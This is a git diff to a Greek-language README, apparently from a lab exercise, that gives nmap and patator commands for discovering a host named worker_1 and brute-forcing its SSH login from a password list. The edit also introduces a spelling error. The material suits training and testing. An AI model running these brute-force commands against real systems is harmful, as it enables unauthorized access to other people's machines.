diff --git a/2. SSH Brute Force/README.md b/2. SSH Brute Force/README.md index 3ac1587..603c636 100644 --- a/2. SSH Brute Force/README.md +++ b/2. SSH Brute Force/README.md @@ -43,7 +43,9 @@ ________________________________________________________________________________ **worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** -* Με την ακόλουθη εντολή εκτελείτε η επίθεση, όπου password.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό κωδικό. +* Με την ακόλουθη εντολή εκτελείτεαι η επίθεση, όπου: +1. password.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό κωδικό +2. **patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker** @@ -52,6 +54,10 @@ ________________________________________________________________________________ **patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.'** _____________________________________________________________________________________________ + + + + **REFERENCES** 1. https://pentestit.medium.com/brute-force-from-ssh-to-web-dc0e986583ae 2. https://en.kali.tools/?p=147